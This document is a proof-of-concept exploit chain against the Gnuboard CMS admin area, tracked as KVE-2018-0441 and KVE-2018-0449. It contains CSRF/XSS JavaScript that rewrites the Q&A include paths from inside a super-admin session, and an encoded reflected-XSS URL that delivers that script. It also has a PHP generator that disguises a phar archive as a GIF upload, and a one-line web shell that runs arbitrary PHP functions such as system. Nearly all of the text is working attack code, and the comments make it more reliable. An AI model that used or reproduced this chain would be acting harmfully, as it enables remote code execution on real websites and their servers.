KVE-2018-0441, KVE-2018-0449 — Gnuboard (그누보드) admin XSS/CSRF-to-RCE PoC via a phar:// include path (Windows targets only)
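// KVE-2018-0441 / KVE-2018-0449 PoC (readable form). Meant to run inside an
// already-authenticated super-admin session of the Gnuboard admin area: it
// relies on page globals (jQuery `$`, `get_ajax_token()`, `g5_bbs_url`) and on
// the admin's cookies being attached to the requests it makes.
//
// Flow: fetch ../qa_config.php and look for the "file path" settings block ->
// load that page in a hidden iframe -> reuse its form with a fresh admin token,
// dropping the empty include fields -> POST it to ../qa_config_update.php with
// qa_include_head / qa_include_tail supplied via the query string -> redirect to
// the Q&A list page, which presumably include()s the configured head/tail path
// (hence the phar:// payload and the a=/b= parameters of the dropped shell).

// Payload written into qa_include_head / qa_include_tail. Supply it RAW (not
// URL-encoded); it is encoded exactly once below. Example pointing at a file
// uploaded through the board that is really a phar archive (note the backslash
// separator, which matches the gist's "Windows only" remark):
//   phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php
const payload = `[PAYLOAD_URL]`;

// Label qa_config.php renders on the editable "file path" settings block.
// NOTE(review): a Korean UI string, so this check presumably depends on the
// admin UI language — confirm on the target.
const FILE_PATH_LABEL = `상단 파일 경로`;

/**
 * True when the fetched qa_config.php body contains the file-path settings
 * block, i.e. the session belongs to a super admin with the feature enabled.
 * Fix: the original tested `indexOf(...) !== false`, which is always true
 * (indexOf yields -1 when absent, never false), so the non-admin branch could
 * never run and the PoC proceeded for every session.
 * @param {string} html - response body of ../qa_config.php
 * @returns {boolean}
 */
function hasFilePathSettings(html) {
  return typeof html === 'string' && html.includes(FILE_PATH_LABEL);
}

// 1. Confirm the current session is a super admin with the feature available.
$.get(`../qa_config.php`, function (configHtml) {
  if (!hasFilePathSettings(configHtml)) {
    // Not a super admin: leave quietly for an ordinary site (e.g. https://naver.com).
    location = `//naver.com/`;
    return;
  }

  // 2. Load the 1:1 Q&A admin page in a hidden iframe to get its real form.
  $(`body`).html(`<iframe src=../qa_config.php width=1 height=1></iframe>`);

  // `.load(fn)` as an event shorthand was removed in jQuery 3; `.on('load', fn)`
  // is the equivalent on every jQuery since 1.7.
  $(`iframe`).on(`load`, function () {
    // The body was just replaced, so the iframe is the only (first) frame.
    const frameDoc = top.window.frames[0].document;
    let exploitable = false;

    // qa_config_update.php expects the admin token.
    $(`input[name=token]`, frameDoc).val(get_ajax_token());

    // Remove qa_include_head / qa_include_tail from the form when they are
    // empty; their values are then supplied through the query string instead.
    for (const field of [`qa_include_head`, `qa_include_tail`]) {
      const input = $(`input[name=${field}]`, frameDoc);
      if (input.val() === ``) {
        input.remove();
        exploitable = true;
      }
    }

    // Both fields already populated: the PoC does not proceed.
    if (!exploitable) {
      alert(`공격이 안됩니다.`);
      return;
    }

    // 3. Submit the form; the payload travels in the query string, encoded once
    //    so that `/`, `:` and `\` in a phar:// path cannot break the URL.
    const formData = $(`form`, frameDoc).serialize();
    const encodedPayload = encodeURIComponent(payload);
    $.post(
      `../qa_config_update.php?qa_include_head=${encodedPayload}&qa_include_tail=${encodedPayload}`,
      formData,
      function () {
        // 4. Done — move to the Q&A page, which now includes the payload.
        alert(`CSRF to RCE 성공`);
        location = g5_bbs_url + `/qalist.php?a=system&b=dir`;
      },
    );
  });
});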
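http://[그누보드URL]/adm/sms_admin/num_book_write.php?exist_msg_2=1%0d%0a}}}});%20return%20false;};var%20payload=`[PAYLOAD_URL]`;$.get(`../qa_config.php`,function(d){if(d.indexOf(`상단%20파일%20경로`)!==-1){$(`body`).html(`<iframe%20src=../qa_config.php%20width=1%20height=1>`);$(`iframe`).load(function(){var%20this_frame=top.window.frames[0].document;var%20exploitable=!1;$(`input[name=token]`,this_frame).val(get_ajax_token());if($(`input[name=qa_include_head]`,this_frame).val()==``){$(`input[name=qa_include_head]`,this_frame).remove();exploitable=!0}%20if($(`input[name=qa_include_tail]`,this_frame).val()==``){$(`input[name=qa_include_tail]`,this_frame).remove();exploitable=!0}%20if(!exploitable){alert(`no`);return}%20var%20form_data=$(`form`,this_frame).serialize();$.post(`../qa_config_update.php?qa_include_head=${payload}%26qa_include_tail=${payload}`,form_data,function(d){location=g5_bbs_url+`/qalist.php?a=system%26b=dir`})})}else{location=`//naver.com/`}})</script><!--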
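<?php
/*
Phar generator for the KVE-2018-0441 / KVE-2018-0449 PoC.

Wraps a local shell.php into a tar-based Phar archive and renames it to .gif so
it can go through the board's image upload; the JS side then points
qa_include_head / qa_include_tail at
  phar://<uploaded path>.gif/GIF89a.php

The entry name "GIF89a.php" is deliberate: a tar header begins with the entry
name, so the archive file itself starts with the bytes "GIF89a". That is
presumably what satisfies the upload-side GIF check — confirm against the
target's upload filter.

Tested with:
# php -v
PHP 7.0.27-0+deb9u1 (cli) (built: Jan 5 2018 13:51:52) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
    with Zend OPcache v7.0.27-0+deb9u1, Copyright (c) 1999-2017, by Zend Technologies
*/

$source  = 'shell.php';   // local file to embed (the dropper)
$archive = 'exploit.tar'; // intermediate tar-based phar
$output  = 'exploit.gif'; // final name handed to the upload form

// Fail loudly instead of silently producing an empty or stale archive.
if (!class_exists('PharData')) {
    fwrite(STDERR, "The phar extension is not available.\n");
    exit(1);
}
if (!is_readable($source)) {
    fwrite(STDERR, "Cannot read $source.\n");
    exit(1);
}
// PharData() opens an existing archive for modification; start from a clean one.
if (file_exists($archive) && !unlink($archive)) {
    fwrite(STDERR, "Cannot remove stale $archive.\n");
    exit(1);
}

$phar = new PharData($archive);
$phar->addFile($source, 'GIF89a.php');
unset($phar); // release the handle so the archive is flushed before renaming

if (!rename($archive, $output)) {
    fwrite(STDERR, "Cannot rename $archive to $output.\n");
    exit(1);
}
echo "Wrote $output\n";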
<?php
// Dropper for the PoC — presumably the shell.php the phar generator embeds as
// GIF89a.php. Calls the PHP function named by ?a= with ?b= as its single
// argument (the JS side lands on qalist.php?a=system&b=dir). The @ suppresses
// the warnings raised when ?a / ?b are missing or ?a is not callable.
@$_GET['a']($_GET['b']);
?>